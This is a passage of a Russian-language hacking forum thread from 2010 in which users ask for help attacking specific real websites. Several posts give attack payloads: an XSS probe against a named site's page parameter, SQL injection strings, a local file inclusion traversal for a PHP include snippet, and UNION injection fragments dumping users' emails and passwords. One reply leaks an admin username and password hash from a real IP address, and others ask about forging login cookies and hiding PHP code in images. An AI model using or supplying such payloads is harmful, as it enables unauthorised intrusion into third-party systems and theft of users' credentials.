Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Покажи ссылку.
     
  2. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Скорее всего - да, но лучше покажи ссылку.
     
    #15002 ZARO, 7 Oct 2010
    Last edited: 7 Oct 2010
  3. high_rez

    high_rez New Member

    Joined:
    23 Aug 2009
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Вот ссылка.

    http://www.vishime.ru/news/zhizn-goroda-v-fotografiyah/?page=16

    Уж очень сильно хочу попасть в его админку www.vishime.ru/admin/ ))) Вроде как сделан с помощью django framework. Сервер в США, Техас, Apach, Fedora.

    Я просто игрался с "?page=%00<script>alert(123)</script>"

    И получил от своего браузера предупреждение о XSS.

    И еще сразу вопрос, почему при гугл запросе site:vishime.ru filetype: любой, нет ничего? Стоит запрет на отображение, что ли?
     
    #15003 high_rez, 7 Oct 2010
    Last edited: 7 Oct 2010
  4. nemans

    nemans Elder - Старейшина

    Joined:
    3 Dec 2006
    Messages:
    34
    Likes Received:
    3
    Reputations:
    0
    сканировать, имеется ли страница в наличие, если да то сохранить что она отображает, скрипт хорошо, но есть ли програмка.
     
  5. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    http://nswx.ru/forum/showthread.php?t=8270
     
    1 person likes this.
  6. JohnnyBGoode

    JohnnyBGoode Member

    Joined:
    5 Oct 2010
    Messages:
    48
    Likes Received:
    11
    Reputations:
    5
    Просканировал один хост WVS-ом,он обнаружил SQL-уязвимости следующего вида .
    Code:
    ?category=10' and 1=0&page=2'
    Ввожу в браузере - толку ноль.В чем причина ?
     
  7. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    возможно просто нет вывода ошибок.

    а вообще бросайте эти сканнеры и учитесь сначала искать руками. когда будет опыт, тогда и сканнеры в помощь.
     
  8. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    никто не знает урлы онлайн-сканеров директорий сайта

    раньше знал пару, но они не пашут уже
     
  9. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    93.84.115.243/bans/ban_details.php
    Можно че нить раскрутить? а то у меня чето не получается = \
     
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    path disclosure если что..

    O:\home\93.84.115.243\www\
     
    _________________________
  11. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    [-_-]
     
    6 people like this.
  12. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    спс
    но вот не могу понять почему не выводит nickname i pass при запросе :
     
  13. boxazbox

    boxazbox Banned

    Joined:
    21 Sep 2010
    Messages:
    9
    Likes Received:
    3
    Reputations:
    6
    username:admin
    password:18a6b0764940adcc543fc2b92e564174
     
    3 people like this.
  14. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    boxazbox, спасибо.
    Такой вопрос.
    допустим логин: 'admin' pass(hash): '18a6b0764940adcc543fc2b92e564174' logcode: 'a0dc927eefd71cce9b70e7ccb066130a'
    Читая этот топик увидел такую фразу как : "если не удастся найти пароль по хешу, можно составить куку."
    https://forum.antichat.ru/thread121710-amxbans.html
    --
    Вопрос: как ее правильно составить эту куку?)
     
  15. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    зависит от логики скрипта
     
  16. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    http://scan.0day.in:8080/action/scan
    http://defec.ru/scaner/
    http://madnet.name/tools/madss/
     
    #15016 h00lyshit!, 9 Oct 2010
    Last edited: 9 Oct 2010
  17. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Есть ли локальный инклуд в этом коде?
    И как его использовать?


    PHP:
    define("modules_dir""data/modules/"); 
    define("template_dir""template/"); 

    // Определяем модуль
    $mod_page = empty($_GET['page']) ? $site['start_page'] : (string) $_GET['page'];

    // Запрешённые шаблоны для показа
    $mods = array('main' => true'error' => true'quick_error' => true'mysql_error' => true);

    if(
    file_exists(modules_dir.$mod_page.'.php') && file_exists(template_dir.$mod_page.'.tpl'))
    {
        include 
    modules_dir$mod_page.'.php';
    }
    else
    {
        if(
    file_exists(template_dir.$mod_page.'.tpl') and !isset($mods[$mod_page]))
        {
            
    $parse->get_tpl(template_dir.$mod_page.'.tpl');
            
    $text $parse->tpl_view();
        }
        else
        {
            
    $system_error[] = 'Непредвиденная ошибка в обработке команды.<br/>Обратитесь к модератору/администратору сайта.';
        }
    }
     
    #15017 Byrger, 9 Oct 2010
    Last edited: 9 Oct 2010
  18. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    script.php?page=../../../../../../../../../[LFI]%00
     
    #15018 попугай, 9 Oct 2010
    Last edited: 9 Oct 2010
  19. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    Привет всем. Помогите понять плз

    Есть скуля

    в таблице юзеров нужные колонки

    username
    password
    email

    Если выводить username без лимита, то на страницу выводятся все 20к юзернэймов (все что есть в бд)

    Но если пытаться вывести так же password или email-то в ответ пустая страница. concat(*) таже фигня, как поотдельности так и вместе обьединял, ничего. username отдельно выводится как угодно,все из базы. Но вместе никак.
    И по отдельности password или email тоже не выводятся. Только через лимит или group_concat(*)

    Думал мож дело в кодировке, пробовал так

    выводятся.
    невыводятся

    тоже некатит
    некатит

    Выводит все таблицы и колонки на страницу, как и юзернэйм. А мыло с пассом нет =(

    выводит и мыло и пасс и поотдельности тоже выводит.

    И через limit они выводятся.

    Но сами по себе нет.
    password,6,7,8,9+from+users--+


    Через like выводятся
    concat_ws(0x3a,email,password),6,7,8,9+from+users+where+email+like+'a%'--+
    но не хочу весь алфавит перебирать =)
    Можно ли как то вывести ВСЕ мыла и пассы. Возможно по какому то общему критерию, который есть в каждой записи...хз. Может скажем в условии можно сделать вывод всех мыл и пассов, у которых колонка id не пустая.
    Очень буду благодарен если обьясните.
     
    #15019 auth_root, 9 Oct 2010
    Last edited: 9 Oct 2010
  20. iget

    iget New Member

    Joined:
    29 Mar 2009
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    Подскажите пожалуйста как в картинку засунуть свой php-код? Ну мне нужно проинклудить картинку вобщем.
     
Thread Status:
Not open for further replies.